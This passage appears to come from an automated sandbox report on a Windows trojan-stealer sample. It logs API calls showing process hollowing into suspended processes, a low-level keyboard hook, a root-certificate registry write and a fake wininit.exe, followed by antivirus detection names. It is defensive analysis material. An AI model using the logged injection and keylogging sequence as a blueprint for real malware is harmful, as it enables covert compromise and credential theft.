
buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: €0€ HX  ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004da000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:   4
base_address: 0x004dc000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: €0€ HX  ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004da000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:   4
base_address: 0x004dc000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3012
process_handle: 0x0000025c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExW

thread_identifier: 0
callback_function: 0x008e0b22
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00000000
1 524639 0
Lionic Trojan.Win32.Generic.4!c
CrowdStrike win/malicious_confidence_90% (W)
VirIT Trojan.Win32.MSIL_Heur.A
Symantec Trojan.Gen.2
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
Avast MalwareX-gen [Trj]
McAfee-GW-Edition PWS-FDOO!2B7ACF39186E
Trapmine malicious.moderate.ml.score
Sophos Mal/Generic-S
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm HEUR:Trojan-Spy.MSIL.Stealer.gen
McAfee PWS-FDOO!2B7ACF39186E
Cylance unsafe
MaxSecure Trojan.Malware.300983.susgen
AVG MalwareX-gen [Trj]
Cybereason malicious.490844
DeepInstinct MALICIOUS
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 912 called NtSetContextThread to modify thread in remote process 2072
Process injection Process 2928 called NtSetContextThread to modify thread in remote process 3012
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5084318
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000260
process_identifier: 2072
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5084318
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000258
process_identifier: 3012
1 0 0
Process injection Process 912 resumed a thread in remote process 2072
Process injection Process 2928 resumed a thread in remote process 3012
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000260
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000258
suspend_count: 1
process_identifier: 3012
1 0 0
file C:\Windows\SysWOW64\wscript.exe
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 912
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 912
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 912
1 0 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 912
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 912
1 0 0

CreateProcessInternalW

thread_identifier: 2076
thread_handle: 0x00000260
process_identifier: 2072
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\Ozgkdiw.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000025c
1 1 0

NtGetContextThread

thread_handle: 0x00000260
1 0 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 909312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000025c
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: €0€ HX  ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004da000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:   4
base_address: 0x004dc000
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2072
process_handle: 0x0000025c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5084318
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000260
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000260
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000214
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000284
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x000003ac
suspend_count: 1
process_identifier: 2072
1 0 0

NtResumeThread

thread_handle: 0x000003c4
suspend_count: 1
process_identifier: 2072
1 0 0

CreateProcessInternalW

thread_identifier: 2932
thread_handle: 0x00000494
process_identifier: 2928
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe
track: 1
command_line: "C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe"
filepath_r: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2928
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2928
1 0 0

NtResumeThread

thread_handle: 0x000001ac
suspend_count: 1
process_identifier: 2928
1 0 0

NtResumeThread

thread_handle: 0x000001e8
suspend_count: 1
process_identifier: 2928
1 0 0

CreateProcessInternalW

thread_identifier: 3016
thread_handle: 0x00000258
process_identifier: 3012
current_directory:
filepath:
track: 1
command_line: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000025c
1 1 0

NtGetContextThread

thread_handle: 0x00000258
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 909312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000025c
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà" v ž”   @ à ?@…D” W  À  H.text¤t v  `.rsrc  x @@.reloc À | @B
base_address: 0x00400000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: €0€ HX  ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004da000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer:   4
base_address: 0x004dc000
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3012
process_handle: 0x0000025c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5084318
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000258
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x00000258
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x000001ac
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x000001ec
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x00000224
suspend_count: 1
process_identifier: 3012
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 3012
1 0 0